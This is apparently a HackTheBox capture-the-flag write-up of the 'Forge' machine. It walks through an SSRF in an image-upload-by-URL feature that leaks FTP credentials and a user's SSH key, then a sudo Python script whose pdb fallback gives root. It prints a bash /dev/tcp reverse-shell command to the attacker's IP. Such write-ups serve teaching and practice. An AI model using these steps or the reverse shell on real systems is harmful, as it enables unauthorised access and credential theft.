Forge

Hello everyone, this is a write up of a HackTheBox machine that I did recently. Enjoy it.

Recon

First we setup our /etc/hosts to have the following entry

10.10.11.111    forge.htb

We start with the usual, scanning

nmap -p- -sCV -oN nmap/initial -T5 --min-rate=5000 forge.htb

And we can see that we find 2 open ports. 22 and 80

An apache server and ssh, then we proceed to scan further the http server, scanning for directories, vhosts and fuzzing around.

For directories I use gobuster, and for vhosts I use ffuf.

We find interesting info, as vhosts we got aXXXX.forge.htb, we set it up in our /etc/hosts

And unfortunately only allows connections from localhost.

As a directory scanning we don't find much interesting urls, so let's continue manually enumerating.

Browser enumeration

From the browser we find a gallery page in the http server that lets you upload images, also there is a functionallity to upload images from urls.

Here is where we start thinking that this is the feature that may be exploited.

We add some url pointing to a server setup by us, and it makes a connection.

We can exploit this upload feature with what is called SSRF

In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like http enabled databases or perform post requests towards internal services which are not intended to be exposed.

So we point to the aXXXX.forge.htb page, and we see a nav that has a link to anouncements.

We check what we have in announcements and we got interesting info.

<!DOCTYPE html>
<html>
<head>
    <title>Announcements</title>
</head>
<body>
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <link rel="stylesheet" type="text/css" href="/static/css/announcements.css">
    <header>
            <nav>
                <h1 class=""><a href="/">Portal home</a></h1>
                <h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
                <h1 class="align-right"><a href="/upload">Upload image</a></h1>
            </nav>
    </header>
    <br><br><br>
    <ul>
        <li>An internal ftp server has been setup with credentials as uXXX:XXX</li>
        <li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
        <li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=&lt;url&gt;.</li>
    </ul>

We have the first found credentials : uXXX:XXX

And the information that we can call directly the ftp server with that credentials.

Uploading http://aXXXX.forge.htb/upload?u=ftp://XXX:XXX@forge.htb gave us:

curl http://forge.htb/uploads/F6Oo6LWADqGtlXe7ztB6
drwxr-xr-x    3 1000     1000         4096 Aug 04 19:23 snap
-rw-r-----    1 0        1000           33 Jan 05 05:54 user.txt

So this must be the home dir of the user, with http://aXXXX.forge.htb/upload?u=ftp://XXX:XXX@FORGE.HTB/.ssh/id_rsa

We can get his ssh key, and we did.

Now we can easy ssh into the server and continue to enumerate.

sudo -l

shows that we can:

sudo /usr/bin/python3 /opt/remote-manage.py 

Which contains a nice cli application, in which if you provide the password that is hardcoded 🙂  it will open an admin interface that can list processes, view memory and others. However, this is in a try, execpt block, that in the except block has pdb, this means you could debug the program, and not only, you could execute python code.

So instead of selecting the provided options 1,2,3 or 4, we could write 69 and it jumps to the except block and switches to pdb.

In there we can just write:

import os
# could do os.system('cat /root/root.txt')
# but that is boring, so we can open a rev shell with
# nc -lvnp 4444 in our attacker machine and here:
os.system('bash -i >& /dev/tcp/10.10.14.4/4444 0>&1')

Aaaaand we are root users :D

Concluding

The important and revealing data is censored as the machine is still active and cannot disclose this information, you got to get it by yourself 😊

The machine is rated as medium, but if you get the idea of the vulnerability fast, is a piece of cake. As getting to escalate priviledges is pretty straight forward and did not need much enumeration once you are in.